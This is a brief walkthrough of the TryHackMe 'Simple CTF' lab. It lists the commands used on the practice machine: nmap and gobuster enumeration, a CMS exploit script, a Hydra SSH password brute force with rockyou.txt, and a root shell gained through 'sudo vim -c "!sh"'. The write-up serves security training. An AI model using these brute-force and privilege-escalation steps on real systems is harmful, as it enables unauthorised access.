Walkthrough: Simple CTF - TryHackMe.
Beginner level ctf.
As usual, the first step is to run nmap to find open ports.
┌──(kali㉿kali)-[~/Documents]
└─$nmap -sV machine-ip
Results:
Port Number Service Name Notes 21 FTP Anonymous login allowed 80 HTTP robots.txt 2222 SSH Non standard ssh port
This will solve the first two questions.
Then we are asked for the CVE to use against the application.
I run GoBuster to find out the directories of our target.
┌──(kali㉿kali)-[~/Documents]
└─$gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt
Results
- /index
- /simple <— This one has a Vulnerability
The /simple dir has a CVE. I did a bit of googling to find the CVE number, type of attack and exploit.
Using the exploit I found the username.
Exploit
┌──(kali㉿kali)-[~/Documents]
└─$python3 exploit.py -u http://machine-ip/simple -w list.txt -c
I struggled a bit to run the exploit, got a couple of errors, but I ended up getting the username.
However, the password took ages and couldn’t get it. Instead I used Hydra:
┌──(kali㉿kali)-[~/Documents]
└─$hydra -l mitch -P rockyou.txt ssh://machine-ip:2222
password found: secret
With this information we can log in using ssh.
┌──(kali㉿kali)-[~/Documents]
└─$ssh mitch@machine-ip -p 2222.
There we find a .txt with the first flag.
Doing cd we found there’s anothers users folder.
To get the root flag we need to check what is this allowed run as sudo using ‘sudo -l’
Vim can be run as sudo and without a password.
┌──(kali㉿kali)-[~/Documents]
└─$sudo vim -c "!sh"
This gives us root privileges.
We go to the root folder to find the final flag.